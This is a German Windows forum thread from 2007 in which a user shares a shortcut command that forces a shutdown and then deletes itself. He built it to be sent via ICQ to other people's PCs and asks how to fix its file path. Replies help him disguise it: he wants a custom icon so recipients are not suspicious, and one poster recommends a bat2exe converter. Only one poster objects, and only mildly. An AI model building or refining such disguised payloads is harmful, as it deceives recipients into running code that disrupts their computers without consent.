Frage zu Shutdown verknüpfung?

Dieses Thema im Forum "Windows" wurde erstellt von sHarEk, 4. Juli 2007 .

  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 4. Juli 2007
    Also ich habe eine verknüpfung erstellt, die meinen Pc runterfährt und sich dann selbst löscht beim reboot und habe sie soweit dass ich sie auch verschiken kann und sie auch andere PC`s runterfährt(bsp. über ICQ versendet).

    Doch das kann sie nur wenn sie vom desktop aus gestartet wird!

    Code:
    %comspec% /k "shutdown -s -t 30 && del "C:\Dokumente und Einstellungen\%username%\Desktop\shutdown.lnk" && exit"
    Da ja eigentlich jeder die empfangenen daten von icq im ICQ Liet ordner hat, hab ich mal was probiert und wollte frage ob das auch wirklihc kappt bevor ich es teste!

    NEUER CODE
    Code:
    %comspec% /k "shutdown -s -t 30 && del "C:\Dokumente und Einstellungen\%username%\Eigene Dateien\ICQ Lite\SEINE ADDE\MEIN NAME_MEINE ADDE\shutdown.lnk" && exit"
    mFg sHarEk
     

  2. Anzeige
  3. #2 4. Juli 2007
    AW: Frage zu Shutdown verknüpfung?

    Vom Pfad her sollte es schon funktionieren,
    aber kann man dise nicht irgdnwie mit %windir% auch machen?
    was so viel wie pfad angabe zu der deit erstezt?

    Gruß BenQ
     
  4. #3 4. Juli 2007
    AW: Frage zu Shutdown verknüpfung?

    Talking To The Kids - AUDIO

    schau mal, da gibt es eine übersicht über die systemvariablen

    und

    du willst das alles über eine verknüpfung machen?
    wäre es nicht sinnvoller, eine batch zu schreiben und die datei als exe zu verschicken?

    ich meine, jmd der so blöd ist auf eine datei ohne dateiendung bzw mit der dateiendung .lnk zu klicken, der klickt auch auf eine exe datei ...

    und,

    was willst du überhaupt damit anfangen, willst du jmd damit überraschen?
    nicht die feine art.
     
  5. #4 4. Juli 2007
    AW: Frage zu Shutdown verknüpfung?

    Ich habene batch datei erstellt,aber der nachteilbei ner batch datei ist,dass ich da das icon nicht ändern kann und somit werden die leute misstrauisch!!

    trozdem THX for all answers!

    mFg sHarEk
     
  6. #5 4. Juli 2007
    AW: Frage zu Shutdown verknüpfung?

    hmmm,

    hast du es einmal an einem anderen pc getestet?
    wenn du kein systemicon genutzt hast, dass jeder auf seinem system hat, wird das icon einer verknüpfung NICHT mit genommen.

    mit

    bat2exe converter

    damit bastelst du aus der batch eine exe und kannst auch ein eigenes icon vergeben, dass in der exe gespeichert wird.
     

  7. Videos zum Thema
Die Seite wird geladen...
Similar Threads - Frage Shutdown verknüpfung
  1. Antworten:
    3
    Aufrufe:
    3.873
  2. Verständnisfrage zu React

    Decryptor , 11. März 2017 , im Forum: Webentwicklung
    Antworten:
    8
    Aufrufe:
    1.849
  3. Antworten:
    6
    Aufrufe:
    2.051
  4. Antworten:
    2
    Aufrufe:
    1.084
  5. Umfrage zu Anabole Steroide

    powerfull , 12. September 2016 , im Forum: Sport und Fitness
    Antworten:
    4
    Aufrufe:
    1.173